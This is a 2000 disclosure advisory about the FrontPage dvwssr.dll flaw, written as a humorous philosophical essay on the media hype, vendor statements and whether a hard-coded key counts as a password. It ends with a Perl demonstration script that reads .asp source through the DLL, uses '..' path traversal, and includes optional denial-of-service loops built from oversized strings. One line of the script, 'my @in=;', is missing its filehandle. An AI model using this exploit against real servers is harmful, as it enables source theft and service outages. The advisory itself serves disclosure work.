---------------- RFP2K03 -------------------------- rfp.labs ------------- Contemplations on dvwssr.dll and how it affects life RFP2K02 Addendum: further information ------------------------------------- rain forest puppy / rfp@wiretrip.net This advisory does contain new, technical information. However, it is structured quite differently, and does contain a wealth of material. It is your own decision whether you read it or not--I do not force you. I only give you the option to listen to what I have to say. A.K.A. don't bitch because it's long. Forewarning served. -------------------------------------------------------------------------- In the words of Russ Cooper on NTBugtraq[1] on Fri: "Ok, so let's deal with this." [1] Couldn't have expressed it better myself. So there I was sitting. An individual injecting permanent black dye into my arm with a small electrical needle device, forming a tribal pattern that will forever be on my arm. Half way through I started to wonder 'why'? And trust me, half way through a tattoo session is not a good time to start wondering such things. Why? Why do such things at all? What would others reactions be to it? Why do I care what others think? Who else is there really? Deep breath. A flood of Descartes enters my mind. What is there beyond myself? How can I be assure of anything beyond me? Quite simply, I can't. I can't tell anyone what it's like to be in Microsoft's place, because I haven't been there. I don't know what it's like to be a Netscape engineer and be called a weenie, because I'm not (a Netscape engineer that is; the other is debatable). I can not positively state for certain anything other than my own perceptions, since I only know what, well, I have personally experienced. So I can only talk of matters concerning me, as when I involve anything beyond myself, I am making assumptions on its form, state, and the perception it offers to me. So I have observed the results of RFP2K02. Every nuance, every publically spoken word on the subject I could find, I have considered, contemplated. What does each contemplation involve? I review them to myself.... --[ The First: Contemplation on origin of the 'hype' By far, one of the largest writings that has provided me with the most contemplation was by Ivan Arce, Presidente of CORE-SDI[2]. After reviewing my advisory, he commented: "So these seems to be quite precise WRT possible attackers and impact, the hype derived from the media coverage does not seem to be part of RFP's agenda." [2] So, I start to ask myself, where did the actual hype come from? So I quest, searching, travelling past self doubt, skirting around fear, stopping only at McDonalds for a #2 extra value meal (super-sized), when I come across the original Wall Street Journal article by Ted Birdis[3]. Ah, yes, I think this is the place. I can only guess to the process. My advisory provides a basis for the problem. But if I was Ted, I would consider that a report from an unconfirmed party. I am not Ted, but this is what I think he thought. I would go straight to the source--Microsoft. Which, not surprisingly, he did. "The manager of Microsoft's security-response center, Steve Lipner, acknowledged the online-security risk in an interview Thursday and described such a backdoor password as "absolutely against our policy" and a firing offense for the as-yet-unidentified employees." [3] Straight from the horses mouth. Proceeding to the other end of the horse... "Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." "It's a serious flaw," Cooper said. "Chances are, you're going to find some major sites that still have it enabled." Lipner of Microsoft said the company will warn the nation's largest Web-site providers directly." [3] Well, I found that interesting. While my advisory may have served as the seed, it was not only confirmed by the direct party responsible, but supported by a second opinion. There's no doubt to me where the 'hype' came from. It's right there. Lipner said "yep", and Russ said "it's widespread". How was anyone to know they would change their minds later? So this was confirmed. And it was Russ who hyped up the widespread appeal to this...I remind myself that my advisory stated it was minimal at best. Then the thought occured to me...Ted Birdis actually had a lead, took the time to follow up with the primary party, and include a secondary opinion. Both were in favor, so he reported it. Considering the quality (or lack thereof) of other journalists, Ted actually researched this, and went on admitted facts from primary sources. Kudos for Ted for actually reporting a story correctly, using concrete journalistic practices. Unfortunately for Ted, Microsoft and Russ changed their stories...but this is not Ted's fault. So, I wonder, where did Ted go wrong? I don't think he did. --[ The Second: Contemplation on Russ Cooper's mighty morphing story "A monk asked Yun Men, 'What are the teachings of a whole lifetime?' Yun Men said, 'An appropriate statement.'" - The Blue Cliff Record So I sat, contemplating, when I wondered what Russ Cooper's view was on the subject at hand. Then I asked myself "well, at what point in time?". I was so confused, I had to make a timeline: * Date: Fri, 14 Apr 2000 ???? "Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." "It's a serious flaw," Cooper said. "Chances are, you're going to find some major sites that still have it enabled." Lipner of Microsoft said the company will warn the nation's largest Web-site providers directly." [3] * Date: Fri, 14 Apr 2000 11:27:09 -0400 "[T]his is a hole that could allow information to be manipulated by "others". However, its limited to "others" who already have web authoring permissions on the same box." [4] * Date: Fri, 14 Apr 2000 15:32:52 -0400 "Latest reports say that there is NO VULNERABILITY IN DVWSSR.DLL" [5] * Date: Sun, 16 Apr 2000 10:02:41 -0400 " >NO VULNERABILITY IN DVWSSR.DLL While I felt right at the time, now we know that that statement is clearly wrong." [6] Ah, I now understand it much better; or, at least, it's easier to follow. But my voices say to me, "why did it change?" Why, indeed, I wonder. My voices are always interesting to listen to. My mind wanders across the words of Russ... "FYI, my comments to Ted Bridis of WSJ yesterday about the issue were made with very little info (only the info he was supplied), so for example my comment that this affects "almost every web hosting provider" was based on the info that this was an issue on machines with FP installed." [4] Ah, indeed. Very good reasoning for a switch in stories, I believe. But that begs another contemplation: why is Russ then serving to provide comments and opinions on issues of which he as "very little info"? Is it professional to hypothesize the extent of such problems? I wonder if that would be considered contributing to the 'hype'? No, I concluded. If *I* had said such a thing, then yes, it would be directly contributing to the hype. But since an authority said such, well, I would hope that it would help clear the waters, rather than muddy them. Yes, muddy. Indeed. I breathe in. I breathe out. I continue to contemplate. --[ The Third: Contemplation on demonstration perl code "Even when I do things for the sake of others No sense of amazement or conceit arises. It is just like feeding myself; I hope for nothing in return." - Shantideva Much to think about. Much to ponder. I will, so it seems, not be without more contemplation. As such, I now ponder on more words of Russ.. "In my independent tests of a default installation of NT 4.0, IIS 4 (from the NT 4.0 Option Kit using the "Typical" installation options), and SP4 (128-bit) I have been *unable* to reproduce the Denial of Service. Every attempt to use the CORE-SDI script, or variations of it, have resulted in a 401 - Unauthorized HTTP error. The server continues to process requests as if nothing had happened. The "Typical" installation installs FP98 extensions, enables the default web site as a Front Page Web, and installs the DVWSSR.DLL. "Please note, I'm either doing something wrong (although several different people have confirmed the same inability to exploit a default installation) or some other modification to the default installation must take place before you become susceptible to the attack. I find some reassurance in the fact the script does not seem to exploit a default installation, but of course I'm leery since both CORE-SDI and Microsoft say its possible. I have so far been unable to determine what exactly it takes for a site to be vulnerable to this problem." [6] This makes my head spin. Not work? Why, I wonder, can Russ not get the exploits to work? Is it his lack of ability to be a script kiddie? Are the scripts non-functional? Do his servers not love him? I do not know, as I am not Russ (I can hear a giggle of relief ruffle through the Hall of the Goddess as I say that). But, a spark of light envolves within me...grows...grows...enlightenment. If I wish to test the vulnerabilities using the included perl script, I need to change the permissions to allow myself to use dvwssr.dll anonymously. What? The voices in my head scream "but that is not normal!". Yes, yes, the included perl script is a *demonstration, not an exploit*. I recall it implements the client side of dvwssr.dll, but it does not implement any web authoring authentication, nor find a way to bypass the default permissions. Thus the reason Russ hits 401 'Not Authenticated' is because he is not providing web authoring authentication. But is there a way around this roadblock, a way to circumvent the bane of ACLs? I recall my own words... "Also, the default permissions don't allow for anonymous users to use the .dll--however, anyone with web authoring can, and I've seen few sites that have allowed permission (which is more due to a misconfiguration on their part)." [8] So I did not speak in err, but perhaps I did not speak loud enough for Russ to hear. Or perhaps Russ just failed to read my words at all. I do not know. But I do know, that if I wish to make dvwssr.dll anonymously usable, I need to give 'Read' permissions on /_vti_bin/_vti_aut/ folder and dvwssr.dll contained within the folder. Once I do that, the script will work. Alas, my imperfections surface. There's a bug in my original script that keeps it from properly encoding filenames greater than 31 characters in length (I should have made it 'my $kc=length($from)%31'). The fixed code is below. I must accept and deal with my mistakes, firm in knowing my imperfections take me farther away from Nirvana. I sigh. But I wonder, should I make a new demonstration, one that does implement web authoring authentication? No, I will not be making a client script that includes web authoring authentication; therefore, this code will be of no use to me other than a controlled demonstration. But, demonstration indeed, as it shows what is possible. But the possibilities in my imagination are endless. In reality, they are limited. Thus the curse of being in a mortal vehicle. --[ The Fourth: Contemplation on passwords and encoding mechanisms "[A] talent for speaking differently, rather than for arguing well, is the chief instrument of cultural change." - Richard Rorty I do not understand. The words of Russ ring around my little puppy head... "THIS IS NOT A PASSWORD..." [7] I'm in over my head. I must consult a master. So I walked over to my shelf, and pulled the tome of tomes by the master sage himself, Bruce Schneier [11]. "Ah", I thought, "this will hold the knowledge I need to understand." Chapter 1, page 1. "The process of disguising a message in such a way as to hide its substance is encryption" Yes, I thought. Microsoft is trying to hide the filename. I recall that Russ even state this himself: "My information says that this string is used to obfuscate file names requested via the dvwssr.dll." [1] So they are using encryption (althought, I like to think it would be better called 'encoding', but I'm just quoting the verse of the master sage Schneier right now). I turn the page. Chapter 1, page 2. "Plaintext is denoted by M, for message, or P, for plaintext. It can be a stream of bits, a text file, a bitmap, a stream of digitized voice, a digital video image...whatever." I wonder if master sage Schneier would include 'filenames' on his list? Surely, I think, he meant to. Perhaps in an upcoming edition he could add it. I continue reading on the same page. "Ciphertext is denoted by C. [...] The encryption function E, operates on M to produce C. Or, in mathmatical notation: E(M) = C Wow, add a square (^2) in there and we'll almost have an Einsteinian property. "In the reverse process, the decryption function D operates on C to produce M: D(C) = M Since the whole point of encrypting and then decrypting a message is to receive the original plaintext, the following identity must hold true: D( E(M) ) = M So I wonder to myself, "does the weenie algorithm hold true, as master Schneier has stated is required?". I contemplate further: I have a filename, which in this case would be the P (plaintext) or M (message) I want to send to the server. I will use M to represent the filename, because the letter P denotes connotations that are scary and I don't want to deal with. Yes, much safer to use M. So I have M. Now, it is apparant to me that the filename is 'disguised' during transport. The client is responsible for disguising it, and the server is responsible for dedisguising (is that a word, I wonder?) it. Dvwssr.dll is the server portion, and they must take the disguised filename, and produce the original version. So I conclude they must have the functional equivalent of D(), thereby taking D(C) = M, my original filename. My perl script take the original filename, and disguises it; therefore, it implements E(M) = C. C is the gobbalty-gook (an oft used technical term) ciphertext that is transfered between the servers. It is clear to me. The client implements a function E(), such that E(filename) = encoded-filename; dvwssr.dll implements a function D(), such that D(encoded-filename) = filename. According to master Schneier, this is the foundation of encryption. Whew, I'm not barking up the wrong tree. Even Russ seems to think so... "...it contains the string because the client would obfuscate the requesting page with it, send it across the wire to the server, and then dvwssr.dll would de-obfuscate with the same string." [7] I continue, Chapter 1, page 3. "If the security of an algorithm is based on keeping the way that algorithm works a secret, it is a restricted algorithm." Who else knew about the details of the weenie encoding schema? I failed to see it published anywhere. I would think that since only Microsoft knew how it worked, it would be considered secret. But I digress, as this being a restricted algorithm or not has no direct bearing on my contemplation. I read. "Even more damning, restricted algorithms allow no quality control or standarization" So that's what happened! No wonder this snuck through Microsoft's QC. I press further. "Despite these major drawbacks, restricted algorithms are enormously popular for low-security applications. Users either don't realize or don't care abut the security problems inherent intheir system. Modern cryptography solves this problem with a key, denoted by K. This key might be any one of a large number of values." While the master sage uses the literal term 'values', I remind my self that a string, such as 'Netscape engineers are weenies!', being of letters, is nothing more than values to a computer. But is the weenie string a key? I must know. Further. "Both the encryption and decryption operations use this key (i.e. they are dependant on the key and this fact is denoted by the K subscript), so the functions now become: Ek(M) = C Dk(C) = M Those functions have the property: Dk( Ek(M) ) = M My neurons race. The value of C that E() produces is dependant on the value of K (which I have denoted in my ASCII algorithm representation [tm] as 'k', small, to indicate subscript). The value of M that D() produces from C is dependant on K. For Dk(Ek(M))=M to work, both values of K must match. Let's look at the algorithm itself. I invoke the awesome power that is perl. sub encodefilename { my $from=shift; my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZ". "abcdefghijklmnopqrstuvwxyz0123456789"; my $key="Netscape engineers are weenies!"; my $kc=length($from)%31; my ($fv,$kv,$tmp,$to,$lett); @letts=split(//,$from); foreach $lett (@letts){ $fv=index $slide, $lett; $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0); $kv=index $slide, substr $key, $kc, 1; if($kv>=0 && $fv>=0){ $tmp= $kv - $fv; if($tmp <0){$tmp +=62;} $to.=substr $slide, $tmp,1; } else { $to.=$lett;} if(++$kc >= length($key)){ $kc=0;} }return $to;} Now, I have a filename. The algorithm takes the difference between a letter in the filename, and the letter in the weenie string, for each letter in the filename. This generated value (which you can think of as LETTER(weenie string) - LETTER(filename) ) is then turned back into a resulting letter, which is the 'encoded' letter. To change it back, we take the value of the encoded letter plus the letter of the weenie string (or, LETTER(encoded string) + LETTER(weenie string) ), and this results back in the same letter we originally had in the filename. But I am over-simplifying. I must remind myself that the actual weenie algorithm adjusts for values above 62 and below 0, etc. But in general, this understanding is sufficient. Now, for experimentation. I succumb to change; I morph "Netscape engineers are weenies!" to "Microsoft engineers are weenies!" And alas, it didn't work. I am stuck wondering to myself "is it because the values of K do not now match, or is it merely a drawback of dvwssr.dll not wanting to admit Microsoft engineers are weenies?". Perhaps dvwssr.dll feared bad karma by using such a phrase. I will never know. But I must consider, perhaps it *was* because the values of K do not match. If I change both values to match, would it continue to work? From the depths of my imagination, one of my voices (as I have many frequent ones) says 'yes'. Yes. Yes, the weenie string functions as value K. Yes, then the mathmatical property of encryption of Dk( Ek(M) ) = M does indeed hold true. I can feel it. I can feel it deep within, that the string "Netscape engineers are weenies!" functions as a private key. But now, I wonder of the terminology. So I consult the great tome of master sage Schneier again. Unfortunately, as I progress, the pictures become more complex. Ack, I fear, I might have to read. Thus I arrive at DES, the woeful algorithm that has recently fallen. After days on contemplation, pages of notation, and hours of frustration, I arrive at the concept of DES is such that (using the ASCII algorithm representation [tm] used above): Ek(M) = C Dk(C) = M Where K is the key, and E() and D() are the encrypting and decrypting functions. In DES applications, I have commonly referred to K as the 'password'. I think others have to--but I am unsure about the concept of 'others'; I only know that of which is myself. So only I know that only I thought of K as a password. And now my memory sparks...the mathmatical notation of DES is exact of that of the weenie algorithm, which is the notation for the basis of cryptographic algorithms. And if DES calls K a 'password', then we might be able to transliterate that same name for the K used in the weenie algorithm. But then an occurance comes upon me...'passwords' seem to be, to me, words I type myself. They are definable by myself. I was not able to define the string "Netscape engineers are weenies!". But is it a 'password?' It serves the same function, K, as what we have called 'passwords'. But I do not type it. I recall such things being referenced on full-disclosure lists prior as being 'hard-coded passwords'. Perhaps it's one of those. Perhaps it's a 'pass phrase'. Or maybe I should only think of it in the cryptological terminology: that of a 'key'. But a 'password', in the sense of DES, is also that of a 'key'. So are all 'passwords' 'keys'? Are all 'keys' 'passwords'? How can "Netscape engineers are weenies!" hold a value of K in the weenie algorithm, and not be a 'password', but another string can hold the value of K in the DES algorithm, and be called a 'password'? I am perplexed. I am truly a small entity in a large world I do not understand. I cry. I collect myself. I continue. And then I come across true enlightenment... "Elias Levy of SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly pointed out that using the term password to apply to that string is not beyond the realm of understanding. The client component mtd2lv.dll and the server component dvwssr.dll both need to know this value, and use it correctly, for communications to work. If you try and talk directly to dvwssr.dll and don't obfuscate your communication with the correct "key", it won't understand you." [5] Beautiful goddess! There within that scripture, my thoughts are justified to myself. I push forth with new found confidence... --[ The Fifth: Contemplation on reading files from a server I quest for knowledge. I wish to absorb, to obtain all that is byteful, consume all that is binary. I collect, amassing data, more and more, filling memory, like a program with a malloc(3) leak. I want files. Alas, the instruments of the guardians prevent me from gaining them. ACLs, permissions, authoring, authentication...all are my bane. I curse them all, just as I curse JP. If I was to have web authoring permissions, I have access to my files. But do I have access to the void, to the files that are not mine? Only if the knowledge is suffixed with a .asp or .asa. This severely limits my absorption of information. But, I wonder, to what extent and I control the flow of this information? It seems I can request files of '..' nature. My virtual hand can break the constraints of what would be known as the 'root web directory'. Surely web authoring wouldn't allow me to casually view files not in the realm of all that is web? I do not know. I just know it works. How dangerous this prospect is, is not for me to judge, because I do not have this problem. I do not use FrontPage. I do not mourn. I leave the judging to Russ Cooper, and judge he did do, indeed. --[ The Sixth: Contemplation on this being a problem There are moments where time can stand still...where a second in my mind is an hour in time. I can not control the passing of minutes; I am only aware that what was now, is not any more. And as I sat contemplating on a voyage of grand proportions, a scripture did indeed materialize. The sages at CORE-SDI have found an imperfection, a buffer overflow, in dvwssr.dll [12]. I look down, noticing that these words reflect the ones I had just transcribed while captivated in the belly of the beastly of beasts, on flight over the glimmering Atlantic ocean. I will not, and do not, deny the word of the master sages of CORE-SDI. I struggle to hold back the envy that those words were published before my own were. I envy. I get over it. I provide the knowledge illustrated in perl, appended to the end of this advisory. But even this imperfections requires access. I wonder, is it a problem then? Russ states "Without proper and full permissions applied across virtual servers on a given box, site leakage or manipulation by others will always be possible in myriad ways." [5] I wonder, then, why this vulnerability is not inclusive of the above statement? Is it because it's doesn't allow a new method of exploitation? Surely another path into the Nirvana is just as important as all previous; why is it not, then, added to the list, to help enumerate the myriad of ways? If there were three ways were, given misconfigured permissions on virtual severs, why can't this be problem number four? Have we reached the allotted maximum for ways in which we can abuse web authoring permissions? Perhaps we should stop, then, lest we buffer overflow... Another voice rises from within. "If this is not a problem, then why is Microsoft still recommending the deletion of dvwssr.dll? This actually breaks functionality". Ugh...yes, the voice is right. I look upon the words of the mighty Microsoft in aghast.. "To eliminate this vulnerability, customers who are hosting web sites using any of the affected products should delete all copies of the file Dvwssr.dll from their servers." [9] Perhaps I do not understand the relationship of cause and effect. To offer a fix is to admit to a problem. But if there is no problem, then why have a fix? I wonder what they are fixing? The words of Yarmond on Slashdot ring quite esosterically: "Time for a new advertising campaign by Microsoft? Don't try to fix the bug, for that is impossible. You must realize the truth: there is no bug." [10] In realizing the truth, my .asp files will be set free. What is the problem? The words of the simplest of Nomads ring true in my mind.. "The risks of having dvwssr.dll are not as severe as originally reported in media outlets Friday morning, but still severe enough that system administrators responsible for NT systems to investigate. The risks involve whether or not a certain DLL is loaded, how rights are set, and potentially how Front Page 98 is used." [13] Is it packaged, clear cut, and sexy, as I would like to have a security vulnerability be? I believe not. But that is the issue, and the only issue, if I narrow my vision to only see the issues of the software itself. I have overheard others. "It's not a password, it's just a meaningless piece of data." Yes, a meaningless piece of data that, when known and used correctly, allow invoccation of the functionality of dvwssr.dll. The same can be said for passwords, keys, etc. "It's not a security vulnerability; it's just a bug." I'm sorry, but how many security vulnerabilties are not bugs? And apart from the buffer overflow, this .dll is functioning as designed and intended. Where's the bug in that (obvious jokes withheld)? "You need web authoring to exploit this, therefore, it doesn't matter." And one needs passwords to gain access to servers...does that make firewalls pointless? Do I not worry about local system security, confident that my remotely accessible services are indeed secure? Not to mention the facts and figures of 'insider attacks'. Who, exactly, does my server grant web authoring privileges to? --[ The Seventh: Contemplation on who doesn't have a clue I have heard of the bird trying to teach a fish to fly, but I have never witnessed a fish coaching a bird on flight. That is, until now. In my stumblings, I encountered by chance an article on Computer Reseller's News site by Imran Anwar [14]. What boggles me to no end is the words: "The CRN Test Center is currently examining a security hole in Microsoft's FrontPage 98 Server Extensions that allows a hacker to cause a web server to crash via denial of service attacks." [14] A sales channel-centric publication is conducting security tests? Oh my, I must sit down. It gets better... "The Test Center is currently seeking the assistance of Microsoft and anyone that can successfully demonstrate how the security hole can be exploited." [14] Another contemplation: should I offer to help? Why does it not work? "The Test Center found a Perl script on the Web that appears to have been authored by the same individual who originally reported the flaw to Microsoft. However in attempting to execute the Perl script, Test Center Engineers ran into syntax errors in the script as well as un-resolved external references." [14] There is definately something wrong in the moons tonight! A sales-oriented, OEM/VAR magazine conducting security testing using a script they found on the web, that is giving unresolved external references? But then I see the script... #!/usr/bin/perl# dvwssr.pl by LordRaYden :)) (neh, bij Rain Forrest Puppy)# # Usage: dvwssr.pl target_host /file/to/retrieve/source#use Socket;$ip=$ARGV[0]; $file=$ARGV[1]; ..... I'm befuddled. LordRaYden has graciously provided a version of my script where the 'use Socket' line is commented out, along with some other modifications. I am puzzled at all of this, yet, I feel some twinge of amusement. OEM/VAR sales magazines conducting security testing on vulnerabilties using 4th-party modified exploits that don't work, and reporting on it. My head hurts. --[ The Eighth: Contemplation on the subliminal meanings and motivations "If we're going to yell "Fire", then there should at least be a real fire to point at." - Russ Cooper [6] Ah, indeed. A verse worth it's weight in gold. As I stood there, with the image of the heated flicker of fire in my eyes, I observed where I was pointing. But I do not have my finger extended towards the leak of .asp knowledge. I do not even have my finger extended towards the imperfection of buffer capacity. My finger is pointing to the fire that seems to be burning so bright, that Russ is blinded to it. It is not the vehicle that concerns me; it is not even the destination...it is the journey itself. Thoughts of the Nietzschean ideal of artistic science float around in my head. I elaborate. I'm not referring to the 'useless inclusion of a silly string meant to do nothing'. I mean the fact that Microsoft can, does, and then attempts to hide situations like this. I can not forget the original admittance of fault. I only wonder if it was the legal or marketing department that stepped in and caused the change in stance. Then I see words that worry me, from Ivan Arce: "Excuse me if im being rude, but in shocked by the fact that our company is being questioned because we found a bug." [2] And there are other words I have gathered, which I can't speak of at the moment, but ring of similar tone. The fact that anyone *other than Microsoft* is being implicated severely boggles my puppy mind. The software of Microsoft, with the responsibilities and implications wherein lying on the shoulders of vulnerability researchers. I'm not going to tell you what it *is*, because I only know what I see. But what I see is a mentality containing slander, coverup, misorganization, and bias, and it is this same mentality that holds the keys to many company's kingdoms. I hope for nothing less than an angel for the one responsible for my well being and the well being of my servers. --[ The Ninth: Contemplation on the meaning of life "What sound does a server make when it stops serving?" - Trambottic A hard contemplation, indeed. But I must ask myself, why ponder the meaning of life? There are smaller nuances that are just as important; for example, what is the meaning of potted meat food products? I have always quested for the answer. The esosteric concept of mechanically separating a chicken, and combining it with partially dehydronated fatty beef tissue seems to be a great mystery worth exploring, as much of a mystery as the meaning of life itself. --[ The Tenth: Contemplation on the echos of the Slashdot Many, many voices. Much enlightenment. I recall only pieces...go to www.slashdot.org to view the crowd. Re:I hope Microsoft SUES and WINS (Score:2) by Azog (thoffman1 at hotmail) on Monday April 17, @12:23AM EST Microsoft sent out TWO security notices regarding this DLL to their security mailing list in the last couple of days. I guess they are part of the irresponsible press and should sue themselves, huh? Bottom Line (Score:1) by HiyaPower on Sunday April 16, @07:10AM EST (#198) Unfortunately, the bottom line still stands. While it might be hard to exploit this hole, the fact that it exists continues to raise serious doubts about the Microsoft QC, and other, perhaps more intentional, inclusions. Re:Now that's professional... (Score:4, Interesting) by Ron Harwood (harwoodr-AT-technologist.calm) on Friday April 14, @06:02AM EST (#46) Actually, the more I think about this, the more it irritates me. Believe it or not, using Visual Interdev is a pretty standard thing with not UNIX web-dev shops... and to come along and say - "oh yeah, we screwed this up because it was funny" is just insane. I cannot fathom what the programmers at MS are thinking. And to say that "well, it doesn't affect 2000" is no better. I have to ask at that point, "Why? Did you come up with something even funnier for 2000?" Re:Not MS policy (Score:5, Insightful) by Black Parrot on Friday April 14, @08:41AM EST (#221) >Rather I think this was a case of coders doing something >without the knowledge of the designers / policy makers or whatever. Perhaps so. But does that make MS look better, or worse? The MS web documentation (see link in my top-level post) indicates that this file is the "gateway" that decides what incoming HTTP connects are allowed to look at. If a rogue programmer can slip a backdoor into a security module, what else is going on in other parts of the system? With this landing in the middle of the investigations/accusations of spyware that are now going on in France, the EU, and elsewhere, I suspect that history will refer to this as the Easter Revelation that killed closed source software. To a French diplomat, it does not matter whether a backdoor was planted by the NSA, Microsoft, or a rogue employee. What matters is whether there are any backdoors in his software at all. -- !pu dekcuf sreenigne tfosorciM That's enough. I can futher ponder over the crowd of comments at my leisure. --[ Inspirational scriptures Thanks to Neohapsis.com for letting me reference their archives. [1] http://archives.neohapsis.com/archives/ntbugtraq/current/0040.html [2] http://archives.neohapsis.com/archives/vuln-dev/current/0153.html [3] http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html [4] http://archives.neohapsis.com/archives/ntbugtraq/current/0035.html [5] http://archives.neohapsis.com/archives/ntbugtraq/current/0042.html [6] http://archives.neohapsis.com/archives/ntbugtraq/current/0045.html [7] http://archives.neohapsis.com/archives/ntbugtraq/current/0041.html [8] http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=2 [9] http://archives.neohapsis.com/archives/vendor/current/0010.html [10] http://slashdot.org/article.pl?sid=00/04/16/003259&mode=thread [11] Applied Cryptography, 2nd ed. - Bruce Schneier, 1996 [12] http://archives.neohapsis.com/archives/ntbugtraq/current/0044.html [13] http://archives.neohapsis.com/archives/vuln-dev/current/0161.html [14] http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID=15872 --[ That of which is called 'perl' #!/usr/bin/perl # dvwssr.pl DEMONSTRATION by rain forest puppy # # rfp@wiretrip.net / www.wiretrip.net/rfp/ # # usage: ./dvwssr.pl # # example: ./dvwssr.pl localhost /default.asp use Socket; $ip=$ARGV[0]; $file=$ARGV[1]; print "Encoding to: ".encodefilename($file)."\n"; $DoS=0; # change to 1 to run the denial of service code if($DoS==0){ # regular request $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file). " HTTP/1.0\n\n"; print sendraw($url); } else {# denial of service - this is crud that I used to make it # crash on accident. The code was for testing something # else. I provide it as-is so you can reproduce exactly # what I was doing. for($x=206;$x>0;$x--){ $B='A'x $x; $file="/$B/..".$file; print "$x "; $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file). " HTTP/1.0\n\n"; print sendraw($url); } # another DoS in the script; uncomment if you're a DoS kiddie. # $B='A'x 10000; # $file="/$B/../die.asp"; # $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file). # " HTTP/1.0\n\n"; # print sendraw($url); } sub encodefilename { my $from=shift; my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; my $key="Netscape engineers are weenies!"; my $kc=length($from)%31; # this was fixed to include the '%31' my ($fv,$kv,$tmp,$to,$lett); @letts=split(//,$from); foreach $lett (@letts){ $fv=index $slide, $lett; $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0); $kv=index $slide, substr $key, $kc, 1; if($kv>=0 && $fv>=0){ $tmp= $kv - $fv; if($tmp <0){$tmp +=62;} $to.=substr $slide, $tmp,1; } else { $to.=$lett;} if(++$kc >= length($key)){ $kc=0;} }return $to;} sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ------------------------------------- rain forest puppy / rfp@wiretrip.net "Bad puppy! No bisquit!" - Carole Fennelly ---------- RFP2K03 ------------------------------------ rfp.labs ---------